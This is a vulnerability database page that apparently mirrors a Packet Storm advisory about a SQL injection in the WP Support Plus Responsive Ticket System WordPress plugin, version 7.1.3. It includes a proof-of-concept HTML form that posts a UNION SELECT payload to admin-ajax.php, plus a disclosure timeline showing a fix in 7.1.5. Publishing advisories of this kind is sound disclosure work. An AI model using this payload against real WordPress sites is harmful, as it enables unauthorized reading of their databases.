Lucene search
K

WordPress Support Plus Responsive Ticket System 7.1.3 SQL Injection

🗓️ 19 Dec 2016 00:00:00Reported by Lenon LeiteType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 80 Views

WordPress Plugin SQL Injection in WP Support Plus Responsive Ticket System 7.1.

Code
`# Exploit Title: WP Support Plus Responsive Ticket System 7.1.3 a WordPress Plugin a Sql Injection  
# Exploit Author: Lenon Leite  
# Vendor Homepage: https://wordpress.org/plugins/wp-support-plus-responsive-ticket-system/  
  
# Software Link: https://wordpress.org/plugins/wp-support-plus-responsive-ticket-system/  
# Contact: http://twitter.com/lenonleite  
# Website: http://lenonleite.com.br/  
# Category: webapps  
# Version: 7.1.3  
# Tested on: Ubuntu 14.04  
  
1 - Description:  
  
Type user access: any user. $_POST[acat_ida] is not escaped. Is accessible for any user.  
  
http://lenonleite.com.br/en/blog/2016/12/13/wp-support-plus-responsive-ticket-system-wordpress-plugin-sql-injection/  
  
2 - Proof of Concept:  
  
<form action="http://target/wp-admin/admin-ajax.php" method="post">  
<input type="text" name="action" value="wpsp_getCatName">  
<input type="text" name="cat_id" value="0 UNION SELECT 1,CONCAT(name,CHAR(58),slug),3 FROM wp_terms WHERE term_id=1">  
<input type="submit" name="">  
</form>  
  
3 - Timeline:  
  
  
- 12/12/2016 a Discovered  
- 13/12/2016 a Vendor notifed  
- 16/12/2016 a Resolve issue version 7.1.5  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation